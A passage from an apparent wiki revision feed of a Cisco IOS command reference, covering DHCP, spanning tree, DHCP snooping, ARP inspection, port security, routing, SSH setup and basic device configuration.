* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example using the default administrative distance value.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Manually define a path to a remote network and specify the administrative distance.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative-distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure a Fully Specified Static Route ===&lt;br /&gt;
A fully specified static route includes both the next-hop IP address and the exit interface. This is commonly used on multi-access networks.&lt;br /&gt;
&lt;br /&gt;
Example:&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 GigabitEthernet0/0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
You can also specify the administrative distance:&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 GigabitEthernet0/0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;exit-interface&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative-distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
 ipv6 route ::/0 2001:ABC:33:44::1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
Chart pulled from https://en.wikipedia.org/wiki/Administrative_distance#Default_administrative_distances&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
! Routing protocol !! Administrative distance&lt;br /&gt;
|-&lt;br /&gt;
| Directly connected interface || 0 (Only the interface itself has an administrative distance of 0, since a route cannot have a distance of less than 1.)&lt;br /&gt;
|-&lt;br /&gt;
| Static route || 1&lt;br /&gt;
|-&lt;br /&gt;
| Dynamic Mobile Network Routing (DMNR) || 3&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP summary route || 5&lt;br /&gt;
|-&lt;br /&gt;
| External BGP || 20&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP internal route || 90&lt;br /&gt;
|-&lt;br /&gt;
| IGRP || 100&lt;br /&gt;
|-&lt;br /&gt;
| Open Shortest Path First (OSPF) || 110&lt;br /&gt;
|-&lt;br /&gt;
| Intermediate System to Intermediate System (IS-IS) || 115&lt;br /&gt;
|-&lt;br /&gt;
| Routing Information Protocol (RIP) || 120&lt;br /&gt;
|-&lt;br /&gt;
| Exterior Gateway Protocol (EGP) || 140&lt;br /&gt;
|-&lt;br /&gt;
| On Demand Routing (ODR) || 160&lt;br /&gt;
|-&lt;br /&gt;
| EIGRP external route || 170&lt;br /&gt;
|-&lt;br /&gt;
| Internal BGP || 200&lt;br /&gt;
|-&lt;br /&gt;
| Next Hop Resolution Protocol (NHRP) || 250&lt;br /&gt;
|-&lt;br /&gt;
| Default static route learned via DHCP || 254&lt;br /&gt;
|-&lt;br /&gt;
| Unknown and unused || 255 (An administrative distance of 255 causes the router to remove the route from the routing table and not use it.)&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1126</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1126"/>
		<updated>2026-02-23T23:07:18Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Configure a Static Route */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway (switch) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
